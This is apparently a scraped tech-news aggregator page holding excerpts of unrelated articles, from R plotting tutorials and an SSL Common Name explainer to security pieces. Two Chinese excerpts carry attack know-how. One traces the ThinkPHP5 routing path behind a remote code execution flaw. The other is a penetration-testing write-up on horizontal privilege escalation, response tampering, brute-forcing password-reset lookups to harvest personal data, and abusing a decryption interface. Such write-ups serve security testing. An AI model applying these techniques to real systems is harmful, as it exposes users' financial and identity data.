Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all 12749 articles
Browse latest View live

Recreating the NBA lead tracker graphic

$
0
0

(This article was first published on R Statistical Odds & Ends , and kindly contributed toR-bloggers)

For each NBA game, nba.com has a really nice graphic which tracks the point differential between the two teams throughout the game. Here is the lead tracker graphic for the game between the LA Clippers and the Phoenix Suns on 10 Dec 2018:


Recreating the NBA lead tracker graphic

Taken from https://www.nba.com/games/20181210/LACPHX#/matchup

I thought it would be cool to try recreating this graphic with R. You might ask: why try to replicate something that exists already? If we are able to pull out the data underlying this graphic, we could do much more than just replicate what is already out there; we have the power to make other visualizations which could be more informative or powerful. (For example, how does this chart look like for all games that the Golden State Warriors played in? Or, how does the chart look like for each quarter of the game?)

The full R code for this post can be found here . For a self-contained script that accepts a game ID parameter and produces the lead tracker graphic, click here .

First, we load the packages that we will use:

library(lubridate) library(rvest) library(stringr) library(tidyverse)

We can get play-by-play data from Basketball-Reference.com ( here is the link for the LAC @ PHX game on 2018-12-10). Here is a snippet of the play-by-play table on that webpage, we would like to extract the columns in red:


Recreating the NBA lead tracker graphic

Play-by-play data from basketball-reference.com.

The code below extracts the webpage, then pulls out rows from the play-by-play table:

# get webpage url <- paste0("https://www.basketball-reference.com/boxscores/pbp/", current_id, ".html") webpage <- read_html(url) # pull out the events from the play-by-play table events <- webpage %>% html_nodes("#pbp") %>% html_nodes("tr") %>% html_text()

events is a character vector that looks like this:


Recreating the NBA lead tracker graphic
We would really like to pull out the data in the boxes above. Timings are easy enough to pull out with regular expressions (e.g. start of the string: at least 1 digit, then :, then at least one digit, then ., then at least one digit). Pulling out the score is a bit trickier: we can’t just use the regular expression denoting a dash with a number on each side. An example of why that doesn’t work is in the purple box above. Whenever a team scores, basketball-reference.com puts a “+2” or “+3” on the left or right of the score, depending on which team scored. In events

, these 3 columns get smushed together into one string. If the team on the left scores, pulling out number-dash-number will give the wrong value (e.g. the purple box above would give 22-2 instead of 2-2).


Recreating the NBA lead tracker graphic

To avoid this issue, we extract the “+”s that may appear on either side of the score. In fact, this has an added advantage: we only need to extract a score if it is different from the previous timestamp. As such, we only have to keep the scores which have a “+” on either side of it. We then post-process the scores.

# get event times & scores times <- str_extract(events, "^\\d+:\\d+.\\d+") scores <- str_extract(events, "[\\+]*\\d+-\\d+[\\+]*") scores <- ifelse(str_detect(scores, "\\+"), scores, NA) df <- data.frame(time = times, score = scores, stringsAsFactors = FALSE) %>% na.omit() # remove the +'s parseScore <- function(x) { if (startsWith(x, "+")) { return(str_sub(x, 3, str_length(x))) } else if (endsWith(x, "+")) { return(str_sub(x, 1, str_length(x) - 1)) } else { return(x) } } df$score <- sapply(df$score, parseScore)
Recreating the NBA lead tracker graphic

Next, we split the score into visitor and home score and compute the point differential (positive means the visitor team is winning):

# split score into visitor and home score, get home advantage df <- df %>% separate(score, into = c("visitor", "home"), sep = "-") %>% mutate(visitor = as.numeric(visitor), home = as.numeric(home), time = ms(time)) %>% mutate(visitor_adv = visitor - home)
Recreating the NBA lead tracker graphic

Next we need to process the timings. Each of the 4 quarters lasts for 12 minutes, while each overtime period (if any) lasts for 5 minutes. The time column shows the amount of time remaining in the current period. We will amend the times so that they show the time elapsed (in seconds) from the start of the game. This notion of time makes it easier for plotting, and works for any number of overtime periods as well.

# get period of play (e.g. Q1, Q2, ...) df$period <- NA period <- 0 prev_time <- ms("0:00") for (i in 1:nrow(df)) { curr_time <- df[i, "time"] if (prev_time < curr_time) { period <- period + 1 } df[i, "period"] <- period prev_time <- curr_time } # convert time such that it runs upwards. regular quarters are 12M long, OT # periods are 5M long df <- df %>% mutate(time = ifelse(period <= 4, as.duration(12 * 60) - as.duration(time), as.duration(5 * 60) - as.duration(time))) %>% mutate(time = ifelse(period <= 4, time + as.duration(12 * 60 * (period - 1)), time + as.duration(12 * 60 * 4) + as.duration(5 * 60 * (period - 5)) ))
Recreating the NBA lead tracker graphic

At this point, we have enough to make crude approximations of the lead tracker graphic:

ggplot() + geom_line(data = df, aes(x = time, y = visitor_adv)) + labs(title = "LAC @ PHX, 2018-12-10") + theme_minimal() + theme(plot.title = element_text(size = rel(1.5), face = "bold", hjust = 0.5))
Recreating the NBA lead tracker graphic
ggplot() + geom_step(data = df, aes(x = time, y = visitor_adv)) + labs(title = "LAC @ PHX, 2018-12-10") + theme_minimal() + theme(plot.title = element_text(size = rel(1.5), face = "bold", hjust = 0.5))
Recreating the NBA lead tracker graphic

Getting the fill colors that NBA.com’s lead tracker has requires a bit more work. We need to split the visitor_adv into two columns: the visitor’s lead (0 if they are behind) and the home’s lead (0 if they are behind). We can then draw the chart above and below the x-axis as two geom_ribbon s. (It’s a little more complicated than that, see this StackOverflow question and this gist for details.) Colors were obtained using imagecolorpicker.com .

df$visitor_lead <- pmax(df$visitor_adv, 0) df$home_lead <- pmin(df$visitor_adv, 0) df_extraSteps <- df %>% mutate(visitor_adv = lag(visitor_adv), visitor_lead = lag(visitor_lead), home_lead = lag(home_lead)) df2 <- bind_rows(df_extraSteps, df) %>% arrange(time) ggplot() + geom_ribbon(data = df2, aes(x = time, ymin = 0, ymax = visitor_lead), fill = "#F7174E") + geom_ribbon(data = df2, aes(x = time, ymin = home_lead, ymax = 0), fill = "#F16031") + labs(title = "LAC @ PHX, 2018-12-10") + theme_minimal() + theme(plot.title = element_text(size = rel(1.5), face = "bold", hjust = 0.5))
Recreating the NBA lead tracker graphic

Almost there! The code below does some touch up to the figure, giving it the correct limits for the y-axis as well as vertical lines for the end of the periods.

# get score differential range (round to nearest 5) ymax <- round(max(df$visitor_adv) * 2, digits = -1) / 2 ymin <- round(min(df$visitor_adv) * 2, digits = -1) / 2 # get period positions and labels periods <- unique(df$period) x_value <- ifelse(periods <= 4, 12 * 60 * periods, 12 * 60 * 4 + 5 * 60 * (periods - 4)) x_label <- ifelse(periods <= 4, paste0("Q", periods), paste0("OT", periods - 4)) ggplot() + geom_ribbon(data = df2, aes(x = time, ymin = 0, ymax = visitor_lead), fill = "#F7174E") + geom_ribbon(data = df2, aes(x = time, ymin = home_lead, ymax = 0), fill = "#F16031") + geom_vline(aes(xintercept = x_value), linetype = 2, col = "grey") + scale_y_continuous(limits = c(ymin, ymax)) + labs(title = "LAC @ PHX, 2018-12-10") + scale_x_continuous(breaks = x_value, labels = x_label) + theme_minimal() + theme(plot.title = element_text(size = rel(1.5), face = "bold", hjust = 0.5), axis.title.x = element_blank(), panel.grid.minor.x = element_blank(), panel.grid.minor.y = element_blank())
Recreating the NBA lead tracker graphic

The figure above is what we set out to plot. However, since we have the underlying data, we can now make plots of the same data that may reveal other trends (code at the end of this R file ). Here are the line and ribbon plots where we look at the absolute score rather than the point differential:


Recreating the NBA lead tracker graphic
Recreating the NBA lead tracker graphic

Here, we add points to the line plot to indicate whether a free throw, 2 pointer or 3 pointer was scored:


Recreating the NBA lead tracker graphic

ThinkPHP5 远程命令执行漏洞分析

$
0
0
前言

Thinkphp官方最近修复了一个严重的远程代码执行漏洞。这个主要漏洞原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令,受影响的版本包括5.0和5.1版本。

测试环境:

ThinkPHP 5.1 beta + win10 64bit + wamp

漏洞分析

网上已经有些分析文章了,我就正向分析下这次漏洞过程。不同版本的ThinkPHP调用过程和代码会稍有差异,本文分析的是ThinkPHP 5.1 beta的代码,其他版本的可以类似的分析。

首先会加载thinkphp/library/think/App.php ,运行run函数

public function run() { // 初始化应用 $this->initialize(); try { if (defined('BIND_MODULE')) { // 模块/控制器绑定 BIND_MODULE && $this->route->bindTo(BIND_MODULE); } elseif ($this->config('app.auto_bind_module')) { // 入口自动绑定 $name = pathinfo($this->request->baseFile(), PATHINFO_FILENAME); if ($name && 'index' != $name && is_dir($this->appPath . $name)) { $this->route->bindTo($name); } } $this->request->filter($this->config('app.default_filter')); // 读取默认语言 $this->lang->range($this->config('app.default_lang')); if ($this->config('app.lang_switch_on')) { // 开启多语言机制 检测当前语言 $this->lang->detect(); } $this->request->langset($this->lang->range()); // 加载系统语言包 $this->lang->load([ $this->thinkPath . 'lang/' . $this->request->langset() . '.php', $this->appPath . 'lang/' . $this->request->langset() . '.php', ]); // 获取应用调度信息 $dispatch = $this->dispatch; if (empty($dispatch)) { // 进行URL路由检测 $dispatch = $this->routeCheck($this->request); } // 记录当前调度信息 $this->request->dispatch($dispatch); // 记录路由和请求信息 if ($this->debug) { $this->log('[ ROUTE ] ' . var_export($this->request->routeinfo(), true)); $this->log('[ HEADER ] ' . var_export($this->request->header(), true)); $this->log('[ PARAM ] ' . var_export($this->request->param(), true)); } // 监听app_begin $this->hook->listen('app_begin', $dispatch); // 请求缓存检查 $this->request->cache( $this->config('app.request_cache'), $this->config('app.request_cache_expire'), $this->config('app.request_cache_except') ); // 执行调度 $data = $dispatch->run(); } catch (HttpResponseException $exception) { $data = $exception->getResponse(); } // 输出数据到客户端 if ($data instanceof Response) { $response = $data; } elseif (!is_null($data)) { // 默认自动识别响应输出类型 $isAjax = $this->request->isAjax(); $type = $isAjax ? $this->config('app.default_ajax_return') : $this->config('app.default_return_type'); $response = Response::create($data, $type); } else { $response = Response::create(); } // 监听app_end $this->hook->listen('app_end', $response); return $response; }
ThinkPHP5 远程命令执行漏洞分析

跟进这个路由检测的routeCheck函数

public function routeCheck() { $path = $this->request->path(); $depr = $this->config('app.pathinfo_depr'); // 路由检测 $files = scandir($this->routePath); foreach ($files as $file) { if (strpos($file, '.php')) { $filename = $this->routePath . DIRECTORY_SEPARATOR . $file; // 导入路由配置 $rules = include $filename; if (is_array($rules)) { $this->route->import($rules); } } } $must = !is_null($this->routeMust) ? $this->routeMust : $this->config('app.url_route_must'); // 路由检测(根据路由定义返回不同的URL调度) return $this->route->check($path, $depr, $must); }

routeCheck函数又调用了path函数,跟进这里的path函数


ThinkPHP5 远程命令执行漏洞分析

在 thinkphp/library/think/Request.php 中定义

public function path() { if (is_null($this->path)) { $suffix = $this->config->get('url_html_suffix'); $pathinfo = $this->pathinfo(); if (false === $suffix) { // 禁止伪静态访问 $this->path = $pathinfo; } elseif ($suffix) { // 去除正常的URL后缀 $this->path = preg_replace('/\.(' . ltrim($suffix, '.') . ')$/i', '', $pathinfo); } else { // 允许任何后缀访问 $this->path = preg_replace('/\.' . $this->ext() . '$/i', '', $pathinfo); } } return $this->path; }

这里的pathinfo也是在Request.php中定义的

public function pathinfo() { if (is_null($this->pathinfo)) { if (isset($_GET[$this->config->get('var_pathinfo')])) { // 判断URL里面是否有兼容模式参数 $_SERVER['PATH_INFO'] = $_GET[$this->config->get('var_pathinfo')]; unset($_GET[$this->config->get('var_pathinfo')]); } elseif ($this->isCli()) { // CLI模式下 index.php module/controller/action/params/... $_SERVER['PATH_INFO'] = isset($_SERVER['argv'][1]) ? $_SERVER['argv'][1] : ''; } // 分析PATHINFO信息 if (!isset($_SERVER['PATH_INFO'])) { foreach ($this->config->get('pathinfo_fetch') as $type) { if (!empty($_SERVER[$type])) { $_SERVER['PATH_INFO'] = (0 === strpos($_SERVER[$type], $_SERVER['SCRIPT_NAME'])) ? substr($_SERVER[$type], strlen($_SERVER['SCRIPT_NAME'])) : $_SERVER[$type]; break; } } } $this->pathinfo = empty($_SERVER['PATH_INFO']) ? '/' : ltrim($_SERVER['PATH_INFO'], '/'); } return $this->pathinfo; } 分析可知 $this->config->get('var_pathinfo') 默认值是s(var_pathinfo是在config/app.php里硬编码的),所以我们可利用$_GET['s']来传递路由信息。

回到 thinkphp/library/think/App.php , 运行到执行调度


ThinkPHP5 远程命令执行漏洞分析

这个就是 thinkphp/library/think/route/dispatch/Module.php 函数run的实例

class Module extends Dispatch { public function run() { $result = $this->action; if (is_string($result)) { $result = explode('/', $result); } if ($this->app->config('app.app_multi_module')) { // 多模块部署 $module = strip_tags(strtolower($result[0] ?: $this->app->config('app.default_module'))); $bind = $this->app['route']->getBind(); $available = false; if ($bind && preg_match('/^[a-z]/is', $bind)) { // 绑定模块 list($bindModule) = explode('/', $bind); if (empty($result[0])) { $module = $bindModule; $available = true; } elseif ($module == $bindModule) { $available = true; } } elseif (!in_array($module, $this->app->config('app.deny_module_list')) && is_dir($this->app->getAppPath() . $module)) { $available = true; } // 模块初始化 if ($module && $available) { // 初始化模块

逻辑让我崩溃之越权姿势分享

$
0
0
0×00 写在前面

本文涉及到三种越权思路,每种方式分别对应了一个实际的案例分享。这是自己在平时的测试中积累并值得分享的一些测试经验,可能不能将问题探究到多深入,希望文中的思路能有所用。

0x01 修改返回包的越权 前情提要

“修改返回包”这个越权的应用场景是一个请求使用加密算法加密请求的应用系统,测试过程中几乎所有的请求均加密,返回包为明文,此处可以使用如下案例中的方式进行越权测试。

案例分享

功能“我的账户”处可以查看当前账户下挂的所有账户对应的信息,同时通过卡片详情可以查看卡片的“账户详情”,以及之后的明细交易,余额等多个功能点。此处以“账户详情”功能为例。


逻辑让我崩溃之越权姿势分享
逻辑让我崩溃之越权姿势分享

首先需要选择“我的账户”,该系统每个POST请求,格式都是同样的加密方式进行,如下所示,参数也只有RSA。

POST /users/cardcenter.do HTTP/1.1 HOST: 1.1.1.1 RSA=WEFGH%^UYBF&HF)WHG($@hh9h9HG)FKJHSKGBGIEBUGIBG(&S(GHEW(*GHHG)))

但是请求返回的信息是明文返回,因为前端展示需要从上一个请求的json数据中提取有效信息,用于其中。

此处问题也就出在这里,下一步的“账户详情”的请求,直接使用前端标签中的value卡号进行查询相关数据,那么,通过修改上一请求的返回包内容,即可为下一请求的水平越权做铺垫。

”我的账户“原请求为:

POST /users/cardcenter.do HTTP/1.1 HOST: 1.1.1.1 RSA=ERfiegiue478y784goehghoHIGUIUUg*^&^(*^%fdfgsg)

”我的账户“原返回为:

{"body":{"Name":"王刚","cardNO":"12345678","value":"24.33","Address":"北京市朝阳区亮马桥","tel":"13333333333"}} 将返回包中的cardNO参数“12345678”修改为其他账号“62308452”,则在前端显示修改后的账号。

再次选择“我的账户”子功能“账户详情”,请求为加密,从返回包的内容可以看出水平越权成功:

{"body":{"Name":"郭德岗","cardNO":"222222","Type":"CNY","calType":"001","bankAddr":"2334","cardValue":"24.33","Address":"北京市朝阳区亮马桥","tel":"13333333333"}{"sublist":"2222220102","cardValue":"1000.00"}

此处案例中上面所述内容的危害为水平越权查询信息,通过上述的方式可以查询他人卡号、证件号、手机号。

但同时在案例其他功能的某一处可以以此方式使用他人银行卡进行缴费。(PS: 找不到截图了,无法拼凑了。em……)

0x02 寻找一个解密接口 前情提要

此案例的应用不同于上一案例,请求不进行加密, POST请求参数不经过任何加密混淆,返回数据的格式统一,并且参数对应值是经过加密处理的,即返回数据中,如果前端需要用到的参数,则返回为解密后的明文,其他参数为密文显示 .


逻辑让我崩溃之越权姿势分享
案例分享

某应用的忘记密码处,存在这样一个流程,当你将自己的登录名(证件号或登录名)发送请求之后,会返回你的部分信息。


逻辑让我崩溃之越权姿势分享
证件号找回密码

尝试使用证件号作为登陆名进行验证找回密码,通过返回包中可以看到返回了“姓名”和“联系方式”的明文,其他字段为空,如下:


逻辑让我崩溃之越权姿势分享
用户名找回密码

尝试使用用户名作为登录名进行验证找回密码,通过翻译包可以看到返回的信息和证件号找回密码一样,包括“姓名”、“电话”、“证件号”,但是登录名的组合要比证件号利用程度更加容易,有很多常用的top500,top100等常见登录名,所以进行爆破的话可以获取大量信息。


逻辑让我崩溃之越权姿势分享
问题-如何解密

但是可能注意到了,返回信息中的信息全是经过混淆加密的,那么如何对加密数据进行解密?这是个问题。

但是下一个请求“验证身份”之后要验证手机短信的时候,请求中将上一个请求查询到的所有密文提交验证了, 然后然后竟然在返回包的js代码里找到了“手机号码”参数的明文信息,那么试试别的参数放到这个位置,Bingo!!!


逻辑让我崩溃之越权姿势分享

如下所示,将姓名参数的明文进行请求,获取了明文密码。

综上所述,可以首先对忘记密码处进行暴力破解,搜集所有的返回的信息密文,之后在验证信息时,对参数进行暴力破解,即可获取所有密文对应的明文信息。此处可以将所有用户的“证件号”、“手机号”、“姓名”、“用户名”进行完整搜集。

同类似,如果遇到一个可以获取加密消息为请求密文的接口,上面的情况也有可能是适用的。 0x04 给加密的请求制造点错误 案例

有些系统测试的时候,请求数据格式为json,并且参数基本固定格式为如下示例所示,同时基本请求数据均在data部分进行加密混淆。


逻辑让我崩溃之越权姿势分享
POST /hello.do HTTP/1.1 Host: 127.0.0.1 {"_zh":"1324","data":"QWERT+YHFGGi+fgfyefgyef+6/"} 尝试思路 是否可以像“案例一”一样,有一个解密的接口,将密文转换为明文,但是此处场景无法获取整个请求的参数提交格式,所以思路不可行; 第二种方法,是否可以构造畸形data参数,从报错异常中构造处完整请求; 思路二的尝试

找到其他查询信息的接口,将任意接口的请求用来替换请求,因为请求接口不同,所以会出现报错信息,观察返回包是否可以解析或者产生什么报错?

首先,该功能接口正常请求和返回信息如下图所示:


逻辑让我崩溃之越权姿势分享

当使用其他功能请求中的datas部分替换该请求的datas部分后,返回信息得到了满意的结果,如下所示:


逻辑让我崩溃之越权姿势分享

对上面的截图分析:

原密文datas的明文可能为: {"name":"test1","ID":"123456","phone":"13333333333"} 畸形密文请求可能为: {"token":"234567890"} 后者的json中参数名不满足此处接口所需的参数和数据,后端无法进行查询,直接返回报错信息为参数缺失,并且给出了具体的参数名,这样的结果就是获取到了此处请求的json中必须包含哪些参数,可以直接构造一个完全符合正常请求的明文请求。

根据实际情况,构造出的明文json请求如下,后端是否会解析呢?


逻辑让我崩溃之越权姿势分享

结果也很明显,后端接收并解析明文json的请求方式:

明文请求 加密请求 思路梳理

此场景几点总结如下两点:

是否可以明文请求以及明文返回,避免明文请求之后依然是密文返回; 是否可以从报错信息中直观获取有效参数名信息,这样可以减少构造参数名时需要大量的猜测过程; 0x05 总结

以上是自己平时测试遇到的情况梳理,希望有可取之处。

RISC-V Will Stop Hackers Dead From Getting Into Your Computer

$
0
0

The greatest hardware hacks of all time were simply the result of finding software keys in memory. The AACS encryption debacle ― the09 F9 key that allowed us to decrypt HD DVDs ― was the result of encryption keys just sitting in main memory, where it could be read by any other program. DeCSS, the hack that gave us all access to DVDs was again the result of encryption keys sitting out in the open.

Because encryption doesn’t work if your keys are just sitting out in the open, system designers have come up with ingenious solutions to prevent evil hackers form accessing these keys. One of the best solutions is the hardware enclave, a tiny bit of silicon that protects keys and other bits of information. Apple has an entire line of chips, Intel has hardware extensions, and all of these are black box solutions. They do work, but we have no idea if there are any vulnerabilities. If you can’t study it, it’s just an article of faith that these hardware enclaves will keep working.

Now, there might be another option. RISC-V researchers are busy creating an Open Source hardware enclave . This is an Open Source project to build secure hardware enclaves to store cryptographic keys and other secret information, and they’re doing it in a way that can be accessed and studied. Trust but verify, yes, and that’s why this is the most innovative hardware development in the last decade.

What is an enclave?

Although as a somewhat new technology, processor enclaves have been around for ages. The first one to reach the public consciousness would be the Secure Enclave Processor (SEP) found in the iPhone 5S. This generation of iPhone introduced several important technological advancements, including Touch ID, the innovative and revolutionary M7 motion coprocessor, and the SEP security coprocessor itself. The iPhone 5S was a technological milestone, and the new at the time SEP stored fingerprint data and cryptographic keys beyond the reach of the actual SOC found in the iPhone.

The iPhone 5S SEP was designed to perform secure services for the rest of the SOC, primarily relating to the Touch ID functionality. Apple’s revolutionary use of a secure enclave processor was extended with the 2016 release of the Touch Bar MacBook Pro and the use of the Apple T1 chip. The T1 chip was again used for TouchID functionality, and demonstrates that Apple is the king of vertical integration.

But Apple isn’t the only company working on secure enclaves for their computing products. Intel has developed the SGX extension which allows for hardware-assisted security enclaves. These enclaves give developers the ability to hide cryptographic keys and the components for digital rights management inside a hardware-protected bit of silicon. AMD, too, has hardware enclaves with the Secure Encrypted Virtualization (SEV). ARM has Trusted Execution environments. While the Intel, AMD, and ARM enclaves are bits of silicon on other bits of silicon ― distinct from Apple’s approach of putting a hardware enclave on an entirely new chip ― the idea remains the same. You want to put secure stuff in secure environments, and enclaves allow you to do that.

Unfortunately, these hardware enclaves are black boxes, and while they do provide a small attack surface, there are problems. AMD’s SEV is already known to have serious security weaknesses , and it is believed SEV does not offer protection from malicious hypervisors, only from accidental hypervisor vulnerabilities. Intel’s Management engine, while not explicitly a hardware enclave, has been shown to be vulnerable to attack . The problem is that these hardware enclaves are black boxes, and security through obscurity does not work at all.

The Open Source Solution

At last week’s RISC-V Summit, researchers at UC Berkeley released their plans for the Keystone Enclave, an Open Source secure enclave based on the RISC-V (PDF). Keystone is a project to build a Trusted Execution Environment (TEE) with secure hardware enclaves based on the RISC-V architecture, the same architecture that’s going into completely Open Source microcontrollers and (soon) Systems on a Chip.


RISC-V Will Stop Hackers Dead From Getting Into Your Computer
The goals of the Keystone project are to build a chain of trust, starting from a silicon Root of Trust stored in tamper-proof hardware. this leads to a Zeroth-stage bootloader and a tamper-proof platform key store. Defining a hardware Root of Trust (RoT) is exceptionally difficult; you can always decapsulate silicon, you can always perform some sort of analysis on a chip to extract keys, and if your supply chain isn’t managed well, you have no idea if the chip you’re basing your RoT on is actually the chip in your computer. However, by using RISC-V and its Open Source HDL, this RoT can at least be studied, unlike the black box solutions from Intel, AMD, and ARM vendors.

The current plans for Keystone include memory isolation, an open framework for building on top of this security enclave, and a minimal but Open Source solution for a security enclave.


RISC-V Will Stop Hackers Dead From Getting Into Your Computer

Right now, the Keystone Enclave is testable on various platforms, including QEMU, FireSim, and on real hardware with the SiFive Unleashed. There’s still much work to do, from formal verification to building out the software stack, libraries, and adding hardware extensions.

This is a game changer for security. Silicon vendors and designers have been shoehorning in hardware enclaves into processors for nearly a decade now, and Apple has gone so far as to create their own enclave chips. All of these solutions are black boxes, and there is no third-party verification that these designs are inherently correct. The RISC-V project is different, and the Keystone Enclave is the best chance we have for creating a truly Open hardware enclave that can be studied and verified independently.

Threat Stack Introduces Bulk Data Export Feature

$
0
0

One of the biggest benefits of the Threat Stack Cloud Security Platform is the deep level of visibility we bring to observing operator behaviors in customers’ cloud runtime environments. We frame this discussion in terms of “security observability,” and it can be distilled into a single question: “If suspicious or risky behaviors occur on one of your servers, what can you see and how quickly can you see it?”

Security observability is here

Reducing this mean-time-to-know metric (MTTK) for Security and DevOps teams to a matter of minutes ― as opposed to hours or days spent digging through logs ― is when the Threat Stack platform truly shines. With this goal of saving our customers time, and surfacing security risks and threats as quickly and as easily as possible, we designed our rules-based alerting engine as a first-class citizen of the platform.

Due to the breadth and depth of event data that we aggregate, we haven’t made the entirety of these datasets available to customers historically. While real-time, rules-based security alerting is our primary focus, we recognize that many of our customers with sophisticated digital forensics, data analytics, and compliance needs want to get as much data as they can out of our platform.

The [data] is out there

In the first quarter of 2019 we will be giving our customers the ability to export all host OS events and file integrity monitoring (FIM) events out of Threat Stack and into their own Amazon S3 buckets. This new feature will make it much easier to get more contextualized data out of Threat Stack.

The format of the data will be no surprise: JSON that’s rich in additional context, just like the event data that’s surfaced when drilling down into Threat Stack alerts. Now, for all event data, even if it never triggers an alert ― typically 99% of data in a well-tuned environment ― customers will be able to efficiently get bulk exports in regular batches to S3.

Once the data lands in a customer’s S3 bucket, there are abundant use cases for integration:

Reporting and visualization workflows: Incorporate Threat Stack data into advanced analytics and threat hunting Security information and event management tools (SIEM): Aggregate Threat Stack events alongside data from other infrastructure monitoring and orchestration systems Cold storage: Persist Threat Stack data long term, in services like Amazon Glacier , to meet advanced compliance requirements

Using the new data portability feature is totally optional. For teams that need this level of detail and long-term data retention, however, the ability to export Threat Stack’s high-fidelity telemetry to S3 will be a simple and efficient way to access large amounts of rich data.

We formally announced this news in a press release , which you can check out for more industry context and expert quotations. Existing Threat Stack customers can also contact their account management teams to learn how they can get started with S3 data portability.

We can’t wait to hear about the new ways customers and partners are deriving value from additional Threat Stack data. Until then!

[Update: Down to $259] Arlo Pro (first-gen) security camera 2-pack on sale for $ ...

$
0
0

Keeping a watchful eye on all areas of your home can be hard when power outlets aren't always available. There are battery-powered security cameras to help with that, and the best we've ever tested are the Arlo Pros. The first-gen Arlo Pro is on sale right now―the two-pack is about $275, which is the lowest price yet.

The Arlo Pro cameras have a rechargeable battery that lasts several months, but actual longevity depends on how much movement it sees. Your footage gets uploaded to the cloud and saved for one week free of charge. The system's dedicated wireless camera hub also has USB ports so you can save every video captured by the system. The Arlo Pro 2 moved from 720p to 1080p, but the video is a bit darker. Depending on where you want to put the cameras, the first-gen might be better for you.


[Update: Down to 9] Arlo Pro (first-gen) security camera 2-pack on sale for $ ...

Arlos come in various multi-camera packs, but the base model first-gen started at more than $400. It hasn't sold for that much in months, but the current $274.99 price tag is still about $75 down where it was a few weeks ago. The sale is valid at Walmart,Best Buy, and Amazon.

Update 1 : 2018/12/13 8:20am PST by Ryan Whitwam Price drop

The 2-camera set has dropped again to $259―about $16 less than it was before. You can get that price at Amazon and Walmart. Best Buy is a few dollars more still.


[Update: Down to 9] Arlo Pro (first-gen) security camera 2-pack on sale for $ ...

End of Update

Source: Walmart , Best Buy , Amazon

Twins on the up

$
0
0

(This article was first published on HighlandR , and kindly contributed toR-bloggers)

Are multiple births on the increase?

My twin boys turned 5 years old today. Wow, time flies. Life is never dull, because twins are still seen as something of a novelty, so wherever we go, we find ourselves in conversation with strangers, who are intrigued by the whole thing.

In order to save time if we ever meet, here’s some FAQ’s:

No, they’re not identical Yes, I’m sure No, they do not have similar personalities They like different things One likes Hulk and Gekko, the other likes Iron Man and Catboy.

Recently I’ve been hearing and seeing anecdotal evidence that twins and multiple births are on the increase. I tried to find some data for Scotland, and while there is a lot of information on births in Scotland available , I couldn’t find breakdowns of multiple births.

However, I did find some information for England and Wales, so let’s look at that.

In this next bit, they key thing that may be of interest is the use of tidyr::gather.

There has been some discussion on #rstats Twitter about things people struggle with and a surprising amount of people struggle to remember the syntax for tidyr’s gather and spread.

(I can neither confirm or deny I am one of them).

The data was found here

library(readxl) library(dplyr) library(tidyr) library(ggplot2) data <- read_xls("birthcharacteristicsworkbook2016.xls", sheet = "Table 11", range = "A10:I87") data <- data %>% rename(Year = X__1, All_ages = `All maternities with multiple births`, Under20 = X__2, `20_to_24` = X__3, `25_to_29` = X__4, `30_to_34` = X__5, `35_to_39` = X__6, `40_to_44` = X__7, `45_and_over` = X__8) # the 1981 data is borked, so ignore that

Note use of gather to combine all the age groups into an age_group variable.

We use the Year column as an index so we have an entry for every age group, for every year, with the value represented as ‘maternities’.

Back to the code:

long_data <- data %>% filter(Year != "1981") %>% gather(key = age_group, value = "maternities", -Year) long_data$Year <- as.numeric(long_data$Year) long_data$age_group <- forcats::as_factor(long_data$age_group) long_data$maternities <- as.numeric(long_data$maternities) ggplot(long_data,aes(Year, maternities), group = age_group) + geom_line() + geom_point() + facet_wrap(vars(age_group), scales = "free_y") + ggtitle(label = "England and Wales maternities with multiple births - numbers", subtitle = "By age of mother, 1940 to 2016") + labs(x = NULL, y = "Multiple maternities")
Twins on the up
Twins on the up
# Let's do rates rates <- read_xls("birthcharacteristicsworkbook2016.xls", sheet = "Table 11", range = "A89:I166") rates <- rates %>% rename(Year = X__1, All_ages = `All maternities with multiple births per 1,000 all maternities`, Under20 = X__2, `20_to_24` = X__3, `25_to_29` = X__4, `30_to_34` = X__5, `35_to_39` = X__6, `40_to_44` = X__7, `45_and_over` = X__8) long_rates <- rates %>% filter(Year != 1981) %>% gather(key = age_group, value = "multiple_maternities_per_1000", -Year) long_rates$Year <- as.numeric(long_rates$Year) long_rates$age_group <- forcats::as_factor(long_rates$age_group) long_rates$multiple_maternities_per_1000 <- as.numeric(long_rates$multiple_maternities_per_1000) ggplot(long_rates,aes(Year, multiple_maternities_per_1000), group = age_group) + geom_line() + geom_point() + facet_wrap(vars(age_group)) + ggtitle(label = "England and Wales Rate of maternities with multiple births - per 1,000 all maternities ", subtitle = "By age of mother, 1940 to 2016") + labs(x = NULL, y = "Multiple maternities")

When we look at maternities with multiple births as a rate per 1000 maternities, we see the increase in multiple births among older mothers, especially in the over 45 group.


Twins on the up

Again, with free scales on the y axis which helps us see almost all age groups are exhibiting an increase compare the 20-24 age group as a rate and as count for example.


Twins on the up

Looks to me that overall, the rate of multiple births is increasing.

What’s driving this?

Can it continue?

Will people ever stop asking us if the twins are identical?


Twins on the up

What Is SSL Certificate CN (Common Name) and Usage?

$
0
0

Common Name or CN is generally used in SSL Certificates. CN is used to define the server name which will be used for secure SSL connection. Generally this SSL certificate used to secure connection between a HTTP/S server and client browser like Chrome, Explorer, Firefox.

Common Name (CN)

Common Name is used to specify the host or server identity. When a client try to connect to a remote server like HTTP server it will first get the SSL certificate of this server. Then compare the Host name or domain name it want to connect with the Common Name provided in the SSL certificate. If they are same it will use the SSL certificate to encrypt connection.

Common name technically represented as commonName field in X.509 certificate specification. X.509 specification is used in SSL certificates which is the same.


What Is SSL Certificate CN (Common Name) and Usage?
Common Name (CN)

We can formulate Command Name like below.

Common Name = Domain Name + Host Name

We can use following domain and host names as Common Name.

poftut.com www.poftut.com *.poftut.com Fully Qualified Domain Name (FQDN)

Fully Qualified Domain Name or FQDN is used with Command Name interchangeable. Fully qualified name is used to define the host name in a strict manner. More details about the FQDN can be found in the following tutorial.

What is FQDN (Fully Qualified Domain Name) with Examples?

Organization Name

Organization name may be misinterpreted with the Common Name. Organization Name is the name of the organization where the IT infrastrure belongs. Organization name shouldn’t be used for common name which will create security problems.

SSL Certificate

SSL is a protocol used to make HTTP protocol secure by encrytpting HTTP traffic. Secure HTTP is name as HTTPS which means HTTP traffic encrypted with the SSL. SSL Certificates uses some key value pairs to define SSL Certificate properties. Common Name is important part of an SSL Certificate which will be checked against host and domain name.

Subject Alternative Name

